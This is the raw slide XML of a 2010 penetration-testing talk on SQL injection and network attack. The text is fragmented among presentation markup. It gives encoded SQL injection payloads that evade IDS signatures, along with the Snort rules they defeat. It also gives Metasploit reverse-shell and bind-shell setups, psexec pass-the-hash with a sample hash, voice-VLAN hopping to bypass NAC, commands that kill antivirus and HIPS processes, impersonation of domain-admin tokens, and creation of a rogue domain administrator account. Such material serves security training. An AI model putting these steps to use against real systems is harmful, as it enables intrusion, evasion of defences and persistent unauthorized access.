        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="236232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 know that people often think this stuff is very black and white, cut and dry - but th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simple truth with sql injection is sometimes you just have a gut feeling that you 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looking at a vulnerable pag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You've tried a bunch of things but for some reason nothing seems to be working. Yo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may be facing some sort of filtering. Maybe the developer has attempted to stop sq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njection by only allowing alphanumeric characters as inpu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4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Filter Eva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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="25146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The first thing that we want to do is determine if the filtering is client-side (ex: be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done with javascrip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View source code and look for any parameters being passed to the website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may be filtered with javascript/vbscript and remove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- Save the page locally and remove offending javascript/vbscrip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c4c4c"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>- Use a local proxy (ex: Paros, Webscarab, Burp Suite)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ar-SA" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4c4c4c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5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Client-Side Fil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erver-side Alphanumeric Fil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 lik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Here we are doing an “or true,” although this time we are using the “like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comparison instead of the “=” sign. We can use this same technique for the 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variants such as “and 1 like 1” or “and 1 like 2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and 1 lik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and 1 lik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6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Restrictive Bla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The key to IDS/IPS evasion is knowing that there is one in plac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With an IPS you can use something like Active Filter Detection or you can try someth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REALLY noisy from  another IP address to see if your IP gets block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Depending of the scope of your engagement you may or may not really be able to identif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when an IDS is in use because it's passive in nat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've honestly found this side of the house to be more proof-of-concept, and just hav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fun as opposed to something I've actually needed on assessment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6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74" name="Line 4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6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76320" y="205740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Signatur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attempt”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flow: to_server, established; content: “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' or 1=1 --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”; nocase; sid: 1; rev:1;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Bypass Techniqu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2=2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&lt;2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 like 1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/**/or /**/2/**/=/**/2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....c'mon everyone name some m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ignature Nega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Having th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in the signature will cause you to miss attacks that don't utilize th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1=1 is not the only way to create a query that returns "true" (ex: 2=2, 1&lt;2, etc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f this signature is so easily bypassed, what is it actually good fo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nsw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It's great for automated tools and kid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8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1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228600" y="22860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5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Let me take you back.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152280" y="228600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8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My Opinion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8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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76320" y="1828800"/>
            <a:ext cx="883908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Signatur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attempt”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flow: to_server, established; pcre: “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(and|or) 1=1 (\-\-|\/\*|\#)/i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”; sid: 1; rev:2;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Bypass Techniqu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2=2%2D%2D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&lt;2%2D%2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1 like 1%2D%2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/**/or /**/2/**/=/**/2%2D%2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....c'mon everyone name some m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Signature Nega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1=1 is not the only way to create a query that returns "true" (ex: 2=2, 1&lt;2, etc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Comments like pretty much anything else can be represented in other encoding typ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ex: (%2D%2D = --)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="16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- It is possible to attack an sql injection vulnerability without using com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If this signature is so easily bypassed, what is it actually good fo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nsw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Again, it's great for automated tools and kid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49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2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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76320" y="1828800"/>
            <a:ext cx="906768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ignature 3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SELEC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tatement”; flow: to_server, established; pcre:”/select.*from.*(\-\-|\/\*|\#)/i”; sid: 2; rev: 1;)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="12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tatement”; flow: to_server, established; pcre:”/union.*(\-\-|\/\*|\#)/i”; sid: 3; rev: 1;)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="12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Bypass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http://[site]/page.asp?id=2 or 2 in (%73%65%6C%65%63%74%20%75%73%65%72)%2D%2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http://[site]/page.asp?id=2 or 2 in (select user)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http://[site]/page.asp?id=-2 %55%4E%49%4F%4E%20%41%4C%4C%20%73%65%6C%65%63%74%201,2,3,(%73%65%6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%65%63%74%20%75%73%65%72),5,6,7%2D%2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http://[site]/page.asp?id=-2 UNION ALL select 1,2,3,(select user),5,6,7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...c'mon everyone name some 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ignature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- Although sigs 3-5 are much better, they don't consider the attacker may use different encoding types such as h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0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3-5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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76320" y="2057400"/>
            <a:ext cx="906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ignature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SELECT statement”; flow: to_server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established; pcre:”/(s|%73)(e|%65)(l|%6C)(e|%65)(c|%63)(t|%74).*(f|%66)(r|%72)(o|%6F)(m|%6D).*(\-\-|\/\*|\#)/i”; sid: 2; rev2;)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="12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ignatur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lert tcp any any -&gt; $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection SELECT statement”; flow: to_server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established; pcre:”/(s|%73|%53)(e|%65|%45)(l|%6C|%4C)(e|%65|%45)(c|%63|%43)(t|%74|%45).*(f|%66|%46)(r|%72|%52)(o|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%6F|%4F)(m|%6D|%4D).*(\-\-|\/\*|\#)/i”; sid: 2; rev: 3;)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4d4d4d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At least signature 7 takes into account case sensitivity with hex enco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But..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There are always other encoding types that the attacker can us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685800" y="114300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 (6-7)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ar-SA" sz="36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1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Practice Your Kung Fu: PH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8" descr="PHPIDS_Smoketest_convert_int.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304920" y="2057400"/>
            <a:ext cx="3962160" cy="4572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PHPIDS_Smoketest_in_select.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648320" y="2057400"/>
            <a:ext cx="42670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2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Practice Your Kung Fu: PH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10" descr="PHPIDS_Smoketest_in_select_encoded.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762120" y="1981080"/>
            <a:ext cx="7848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228600" y="22860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The real trick for each of these techniques is to understand that this is just like ID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evasion in the service based exploitation side of the hous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You have to make sure that your attack actually works. It's easy to bypass an IDS, bu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you can just as easily end up with your attack bypassing the IDS, but not working at al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With this in mind you can mix/match the IDS evasion tricks - it's just a matter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understanding the regex in u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%20or%202%20in%20(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IDS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73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evasion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5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is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C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easy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5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just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3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ask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74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j0e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20%75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to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73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teach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65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you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%72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*how*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)%2D%2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What is passed to the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http://[site]/page.asp?id=2 or 2 in (select user)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7280" indent="-557280">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
                <a:tab algn="l" pos="557280"/>
                <a:tab algn="l" pos="1014480"/>
                <a:tab algn="l" pos="1471680"/>
                <a:tab algn="l" pos="1928880"/>
                <a:tab algn="l" pos="2386080"/>
                <a:tab algn="l" pos="2843280"/>
                <a:tab algn="l" pos="3300480"/>
                <a:tab algn="l" pos="3757680"/>
                <a:tab algn="l" pos="4214880"/>
                <a:tab algn="l" pos="4672080"/>
                <a:tab algn="l" pos="5129280"/>
                <a:tab algn="l" pos="5586480"/>
                <a:tab algn="l" pos="6043680"/>
                <a:tab algn="l" pos="6500880"/>
                <a:tab algn="l" pos="6958080"/>
                <a:tab algn="l" pos="7415280"/>
                <a:tab algn="l" pos="7872480"/>
                <a:tab algn="l" pos="8329680"/>
                <a:tab algn="l" pos="8786880"/>
                <a:tab algn="l" pos="9244080"/>
                <a:tab algn="l" pos="970128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n comments ("IDS evasion is easy just ask j0e to teach you how")</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4c4c4c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3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Signature Based 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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="22860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udo ./msfconsole            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Be sure to run as root so you can set the LPORT to 44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se exploi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/[name of newest browser, PDF, ActiveX, or fileformat exploit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t PAYLOAD windows/meterpreter/reverse_t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t ExitOnSession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t LHOS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[your public ip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t LPORT 44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exploit -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3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etting in via clinet-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228600" y="205740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vn co http://svn.thepentest.com/social_engineering_toolkit/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ET/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4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T is some next level sh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8" descr="SET.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="2666880"/>
            <a:ext cx="5838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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1828800"/>
            <a:ext cx="8839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ivot Attack: Using a compromised host as a launching point to attack other hosts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......set up standard explo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explo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ou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trl-z &lt;-- background the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back &lt;--- you need to get to main msf&gt; prom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Now set up Pivot with a route ad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oute add 192.168.10.131 255.25.255.0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 &lt;--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Use correct session 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oute print &lt;----- verif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e exploit/windows/smb/ms08_067_d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et PAYLOAD windows/shell/bind_t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et RHOST 192.168.10.1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et LPORT 1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trl-z &lt;-- background the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back &lt;--- you need to get to main msf&gt; prom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Run auxillaries &amp; exploits through your piv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e scanner/smb/ver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set RHOSTS 192.168.10.1/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ru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5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Pivoting into the LAN</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ar-SA" sz="32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228600" y="22860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Step 1: Tell customer you are 31337 security profes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ustomers only applied patches if it fixed something on the syste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It was common practice NOT to apply system updates that didn't fix a problem you we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experiencing on a system (WTF ARE YOU DOING - YOU MIGHT BREAK SOMETHING!!!!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Step 2: Scan customer network with ISS or Nessus if you were a renega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ustomers didn't apply patches, and rarely even had firewalls and IDSs back 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You know you only ran ISS because it had nice reports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Step 3: Break out your uber 31337 warez and 0wn it all!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You only kept an exploit archive to save time (Hack.co.za was all you needed back the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76360"/>
                <a:tab algn="l" pos="1033560"/>
                <a:tab algn="l" pos="1490760"/>
                <a:tab algn="l" pos="1947960"/>
                <a:tab algn="l" pos="2405160"/>
                <a:tab algn="l" pos="2862360"/>
                <a:tab algn="l" pos="3319560"/>
                <a:tab algn="l" pos="3776760"/>
                <a:tab algn="l" pos="4233960"/>
                <a:tab algn="l" pos="4691160"/>
                <a:tab algn="l" pos="5148360"/>
                <a:tab algn="l" pos="5605560"/>
                <a:tab algn="l" pos="6062760"/>
                <a:tab algn="l" pos="6519960"/>
                <a:tab algn="l" pos="6977160"/>
                <a:tab algn="l" pos="7434360"/>
                <a:tab algn="l" pos="7891560"/>
                <a:tab algn="l" pos="8348760"/>
                <a:tab algn="l" pos="8805960"/>
                <a:tab algn="l" pos="9263160"/>
                <a:tab algn="l" pos="97203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</a:rPr>
              <a:t>If you could read the screen you could 0wn the network!!!!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6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Penetration Testing Was Easy.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228600" y="2971800"/>
            <a:ext cx="883908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Can’t get on the network?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NO DHCP – static IP addr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DHCP MAC Address reserv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Port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NA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6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Common LAN Security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228600" y="2514600"/>
            <a:ext cx="883908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Can’t get on the network?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NO DHCP – static IP addr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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Steal valid IP address from h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DHCP MAC Address reserv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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Steal valid MAC addr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Port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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Steal valid MAC/IP addr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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod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NA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008000" indent="-55080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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Look for 802.1x exceptions such as printers, VoIP ph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6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685800" y="1271520"/>
            <a:ext cx="7772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Common LAN Security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228600" y="2057400"/>
            <a:ext cx="8839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Can’t get on the network????? Jump into the voice V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wget http://www.candelatech.com/~greear/vlan/vlan.1.9.tar.g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tar -zxvf vlan.1.9.tar.g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d v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tshark -i eth0 -v -v "ether host 01:00:0c:cc:cc:cc and (ether[24:2] = 0x2000 or ether[20:2] = 0x2000)" | grep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vconfig add eth0 200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# 200 is Voice VLAN ID in thi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ifconfig eth0.200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# Verify new interface was cre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dhcpd -d -t 10 eth0.200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# Try to get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Voiphopper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voiphopper.sourceforge.net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75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Bypassing NAC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228600" y="2057400"/>
            <a:ext cx="88390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c:\set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e SET to get domain information and user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view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VIEW to get computers in the users domain and other dom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view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VIEW to get computers in other dom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user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USER to get local users on the computer you are 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user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users in the current user's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localgroup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LOCALGROUP to get the local groups on the comput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localgroup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 NET LOCALGROUP to get the domain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localgroup administrators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users in the local administrators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localgroup administrators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users in the domain administrators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group "Company Admins"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users in the "Company Admins"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et user "joe.mccray" /domain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All info about this u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c:\nltest /dclist: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List Domain Controllers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Basically browsing network neighborhood, and querying Active Directory will always be considered legitimate traff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to an NIPS so you can use NET commands to enumerate  a network without port scan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49040"/>
                <a:tab algn="l" pos="10506240"/>
                <a:tab algn="l" pos="1051236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8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457200" y="127152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6600"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Enumerating The Internal Network Against NIPS/HI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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="201132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ome commands to identify a logged in u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BTSTAT -a remotecomputer | FIND "&lt;03&gt;" | FIND /I /V "remotecomputer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WMIC /Node:remotecomputer ComputerSystem Get User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LOGGEDON -L \\remotecompu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EXEC \\remotecomputer NET CONFIG WORKSTATION | FIND /I " name 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EXEC \\remotecomputer NET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EXEC \\remotecomputer NETSH DIAG SHOW COMPUTER /V | FIND /i "username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8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ooking Around the Network For A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28600" y="201132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moking some MSF hash: Moving around the network using password has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d4d4d"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>use exploit/windows/smb/psexe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RHOST 192.168.10.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SMBUser administ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SMBPass 01fc5a6be7bc6929aad3b435b51404ee:0cb6948805f797bf2a82807973b89537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PAYLOAD windows/shell/reverse_t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set LHOST 192.168.10.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explo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596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ving Around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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2133720"/>
            <a:ext cx="8839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1.  Stop the overall AV Fra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"McAfee Framework Service"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2.  Stop the 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entercepta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fire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3.  McAfee Proc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Udater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TB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Mcshie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VsTskMg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shst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4.  HIPS Proc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firet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03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304920" y="1271520"/>
            <a:ext cx="8534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Killing The HIPS (as SYSTEM with “at” command)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8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="2971800"/>
            <a:ext cx="548640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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2133720"/>
            <a:ext cx="8839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1.  Stop the overall AV Fra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"McAfee Framework Service"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2.  Stop the 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entercepta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net stop fire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3.  McAfee Proc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Udater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TB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Mcshie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VsTskMg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shst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4.  HIPS Proce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pskill -t firet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11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457200" y="1271520"/>
            <a:ext cx="8458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Killing The HIPS (as SYSTEM with Metasploit)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8" descr="getsystem.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819520" y="2666880"/>
            <a:ext cx="6029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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="201132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tealing a domain administrator's token.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use incogni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list_tokens -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impersonate_token "domain\\user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execute -c -H -f cmd -a "/k" -i -t &lt;--- Use the -t to use your impersonated tok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 &gt; list_tokens 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 &gt; impersonate_token "DOMAIN\\Domain Admins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meterpreter&gt; execute -c -H -f cmd -a "/k" -i -t &lt;--- Use the -t to use your impersonated tok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Add yourself to the Domain Admin's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c:\net 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user j0e j0eR0ck$ /domain /ad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c:\net </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4c4c4c"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>localgroup administrators j0e /domain /ad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1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Owning Th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Picture 8" descr="::::Picture 1.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419720" y="4419720"/>
            <a:ext cx="441936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228600" y="2011320"/>
            <a:ext cx="883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4c4c4c"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>I have 1- 2 page defensive docs for every attack I covered to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ts val="1800"/>
              </a:lnSpc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27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685800" y="12715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228600" y="2286000"/>
            <a:ext cx="8915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72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698120"/>
            <a:ext cx="82296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f you were Ub3r 31337 you did it like this.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6948360" cy="387324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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="25146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Toll Free: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1-866-892-21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Email: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joe@learnsecurityonlin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Twitter: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twitter.com/j0emcc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LinkedIn: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ttp://www.linkedin.com/in/joemcc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0800" indent="-550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50800"/>
                <a:tab algn="l" pos="1008000"/>
                <a:tab algn="l" pos="1465200"/>
                <a:tab algn="l" pos="1922400"/>
                <a:tab algn="l" pos="2379600"/>
                <a:tab algn="l" pos="2836800"/>
                <a:tab algn="l" pos="3294000"/>
                <a:tab algn="l" pos="3751200"/>
                <a:tab algn="l" pos="4208400"/>
                <a:tab algn="l" pos="4665600"/>
                <a:tab algn="l" pos="5122800"/>
                <a:tab algn="l" pos="5580000"/>
                <a:tab algn="l" pos="6037200"/>
                <a:tab algn="l" pos="6494400"/>
                <a:tab algn="l" pos="6951600"/>
                <a:tab algn="l" pos="7408800"/>
                <a:tab algn="l" pos="7866000"/>
                <a:tab algn="l" pos="8323200"/>
                <a:tab algn="l" pos="8780400"/>
                <a:tab algn="l" pos="9237600"/>
                <a:tab algn="l" pos="96948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634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>
            <a:off x="0" y="652464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60948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"/>
              </a:rPr>
              <a:t>Holla @ Me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79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Port Scan &amp; Banner Grab The Target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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2028960"/>
            <a:ext cx="436248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0" y="1371600"/>
            <a:ext cx="914400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95640" y="2666880"/>
            <a:ext cx="6948360" cy="3873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457200" y="274320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24360" cy="80964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>
            <a:off x="0" y="14130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0" y="640080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408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Get your exploit code...</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff6600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228600" y="2286000"/>
            <a:ext cx="4343400" cy="4341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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="22860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0e</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-08-01T22:01:22Z</dcterms:modified>
  <cp:revision>89</cp:revision>
  <dc:subject/>
  <dc:title>SQL Injection  For Mere Mortals</dc:title>
</cp:coreProperties>
</file>